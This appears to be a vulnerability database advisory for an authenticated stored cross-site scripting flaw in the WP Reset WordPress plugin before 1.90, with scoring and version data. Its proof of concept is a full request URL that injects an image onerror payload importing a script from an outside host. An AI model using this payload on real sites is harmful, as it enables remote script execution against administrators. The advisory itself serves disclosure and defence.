WP Reset < 1.90 - Authenticated Stored XSS

2021-06-1600:00:00

m0ze

wpscan.com

0.001 Low

EPSS

Percentile

24.8%

JSON

The plugin did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue

PoC

PoC | Authenticated Persistent XSS | Enter snapshot name or brief description: https://example.com/wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&tool;=create_snapshot&extra;_data=<img src%3Dx onerror%3D%3Bimport(`%2F%2Fm0ze.ru%2Fpayload%2Fa.js`)%3B %2F%2F>

CPENameOperatorVersion
wp-resetlt1.90

CPE	Name	Operator	Version
	wp-reset	lt	1.90

References

m0ze.ru/vulnerability/[2021-05-26]-[WordPress]-[CWE-79]-WP-Reset-WordPress-Plugin-v1.86.txt

0.001 Low

EPSS

Percentile

24.8%

JSON

Related for WPVDB-ID:90CF8F9D-4D37-405D-B161-239BDB281828